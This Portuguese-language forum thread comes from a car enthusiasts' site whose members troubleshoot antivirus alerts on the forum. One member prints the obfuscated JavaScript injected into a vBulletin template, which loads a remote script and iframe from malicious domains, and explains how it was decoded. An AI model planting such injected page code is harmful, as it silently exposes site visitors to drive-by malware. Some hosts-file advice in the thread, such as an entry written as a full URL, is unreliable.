Announcement

Collapse
No announcement yet.

Aviso antivirus!

Collapse
X

• Filtrar
  • Time
  • Mostrar
Clear All
new posts

Originally posted by kalu View Post
    Boas.
    Acabei de bloquear a gama completa desse IP, mas nunca me deu nenhuma mensagem!

Encontrei algo relacionado na net, mas só afecta o Internet Explorer, como uso o Mozilla nunca apareceu nada!

---------- Mensagem adicionada em 11:21 PM ---------- Mensagem anterior em 10:53 PM ----------

OK,

Acho que já dei com a bronca, a fonte do problema está em um código infectado e está localizado no interior de uma tabela referente a um template na base de dados
    Deve-se fazer uma procura no phpMyAdmin no vBulletin_init na tabela dos templates e vão encontrar isto:

Code:

var script=document.createElement(String.fromCharCode( 115,99,114,105,112,116));script.src=String.fromCha rCode(104,116,116,112,58,47,47,105,109,97,103,101, 50,121,111,117,46,105,110,47,106,113,117,101,114,1 21,46,99,111,109,112,97,116,105,98,105,108,105,116 ,121,46,106,115);var head=document.getElementsByTagName(String.fromChar Code(104,101,97,100))[0];head.appendChild(script);
    Este código inclui o redirecionamento. Se descodificar obten-se isto apartir do segundo fromCharCode() :

http://image2you.in/jquery.compatibility.js

Neste java ele carrega o iframe.src = 'http://directmarketingmanage.in/in.cgi?walter' no iframe. este código deve ser removido á mão para resolver o problema.

Esta ameaça e introduzida no MySQL atravéz de SQL INjection, este processo de provocar introdução nas base de dados on-line já existe há muito tempo.

haaa os meus velhos tempos de hacker!!!

---------- Mensagem adicionada em 11:29 PM ---------- Mensagem anterior em 11:21 PM ----------

Aos utilizadores afectados devem verificar o host file para ver se foram adicionados nos link's ao mesmo:
    No Xp o conteúdo do host deve ser o seguinte:
    # Copyright (c) 1993-1999 Microsoft Corp.
    #
    # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
    #
    # This file contains the mappings of IP addresses to host names. Each
    # entry should be kept on an individual line. The IP address should
    # be placed in the first column followed by the corresponding host name.
    # The IP address and the host name should be separated by at least one
    # space.
    #
    # Additionally, comments (such as these) may be inserted on individual
    # lines or following the machine name denoted by a '#' symbol.
    #
    # For example:
    #
    # 102.54.94.97 rhino.acme.com # source server
    # 38.25.63.10 x.acme.com # x client host

127.0.0.1 localhost

Relativo aos outros sistemas operativos o ficheiro deve ser muito idêntico.

Bom trabalho desenvolvido pelo Kalu :fixe, já fiz o mencionado mas não resulta terá que ser um Administrador do fórum a eliminar, pois no meu caso voltou e estou a uzar o Mozilla...
    Já se torno um pouco incomudo sempre a aparecer o aviso
    Abraços

Comentar

Acontece já alguns dias, eu uso o Mozilla e cada página que abro nos Toyotistas aparece sempre a mensagem.

Comentar

Sérgio, já foi detetado o problema pelo Kalu, basta agora algum dos Administradores fazerem o que foi descrito...
        Digo, eu...
        :fixe

Comentar

BOas.
          Para os afectados por este exploit sigam as instruções do link pata bloquear o endereço no mozila (penso que funciona para o resto dos brownser's))

aproveitem bloqueiem os cokies...

How to block websites in Mozilla Firefox?? - Yahoo! Answers

Comentar

quando ligo o forum o antivirus da-me sinal!![COLOR="Silver"]

ainda agora quando o liguei fez isso.

Comentar

Nestas alturas ainda gosto mais de Apple :lol

Comentar

Originally posted by kalu View Post
                BOas.
                Para os afectados por este exploit sigam as instruções do link pata bloquear o endereço no mozila (penso que funciona para o resto dos brownser's))

aproveitem bloqueiem os cokies...

How to block websites in Mozilla Firefox?? - Yahoo! Answers
                Feito como descrito,:nao dá... pelo menos no meu...:(

---------- Mensagem adicionada em 11:10 PM ---------- Mensagem anterior em 11:05 PM ----------

Ficou assim no meu pc:

# Copyright (c) 1993-1999 Microsoft Corp.
                #
                # Este é um ficheiro HOSTS de exemplo utilizado pelo TCP/IP da Microsoft
                # para Windows.
                #
                # Este ficheiro contém os mapeamentos de endereços IP para nomes de
                # anfitrião. Cada entrada deve ser mantida numa linha individual. O
                # endereço IP deve ser colocado na primeira coluna, seguido do nome de
                # anfitrião correspondente. O endereço IP e o nome do anfitrião devem
                # ser separados por pelo menos um espaço.
                #
                # Adicionalmente, comentários (como estes) podem ser inseridos em linhas
                # individuais ou após o nome de computador indicado por um símbolo '#'.
                #
                # Por exemplo:
                #

127.0.0.1 localhost

127.0.0.1 http://image2you.in/jquery.compatibility.js

Comentar

Cada pagina que abro, cada aviso que recebo.

Comentar

já estou a :rebentarircom os avisos...

Comentar

Eu também fui fortemente atacado por vírus ao aceder à página, o anti-virus portou-se +-, tive de recorrer também à ajuda do Anti-malware. Coloquei também a protecção do windows no máximo e até ao momento não tive mais nenhum sinal de alerta.

Comentar

Só tenho duas coisas a fazer, eu deixo de vir aqui ao forúm (que não deve fazer muita diferença aos administradores) ou continuo a reclamar por nada ser feito para acabar com estes avisos de ameaças de vírus (se fosse alguém a não cumprir com as regras, já estavam a ser chamados à atenção...)
                        Hoje vou optar por reclamar...

Comentar

Já chegou aqui também :lol

Comentar

Já estou a procurar a código...

---------- Mensagem adicionada em 02:09 AM ---------- Mensagem anterior em 01:46 AM ----------

Para testarem
                            Façam log off
                            Apaguem os cokies e os ficheiros temporários da net.
                            Loguem e experimentem, enviem-me os avisos que aparecem para
                            helpdesk@lizbit.pt

Comentar

Ao que parece está resolvido, já não me aparece nenhum aviso :p
                              Não sei se foi o Kalu a resolver esta situação, mas a quem foi um bem haja...:palmas
                              Abraços Toyotistas :fixe

Comentar

Originally posted by SEDAN View Post
                                Ao que parece está resolvido, já não me aparece nenhum aviso :p
                                X2 Parece estar bom por aqui também.

Comentar

Em processamento...
                                X